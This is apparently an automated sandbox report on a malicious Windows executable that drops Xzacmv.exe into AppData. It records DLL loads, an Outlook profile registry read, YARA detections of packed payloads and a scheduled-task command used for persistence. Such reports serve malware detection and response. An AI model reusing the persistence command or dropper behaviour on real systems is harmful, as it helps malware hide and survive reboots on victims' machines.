Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: oAUBqI6vQ7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: oAUBqI6vQ7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: oAUBqI6vQ7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: rKApz.pdb source: oAUBqI6vQ7.exe, Xzacmv.exe.0.dr
Source:	Binary string: rKApz.pdbSHA256R source: oAUBqI6vQ7.exe, Xzacmv.exe.0.dr

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Xzacmv.exe.3aab850.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Xzacmv.exe.3ac5870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: oAUBqI6vQ7.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Xzacmv.exe PID: 8160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Xzacmv.exe PID: 4900, type: MEMORYSTR

Source: oAUBqI6vQ7.exe

Static PE information: 0x9FC81C5F [Sat Dec 12 12:36:47 2054 UTC]

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_0762F892 push esp; retf	0_2_0762F8B1
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_07DE434C push eax; iretd	0_2_07DE434D
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_06FD434C push eax; iretd	10_2_06FD434D
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 15_2_00402AC0 push eax; ret	15_2_00402AD4
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 15_2_00402AC0 push eax; ret	15_2_00402AFC

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

File created: C:\Users\user\AppData\Roaming\Xzacmv.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
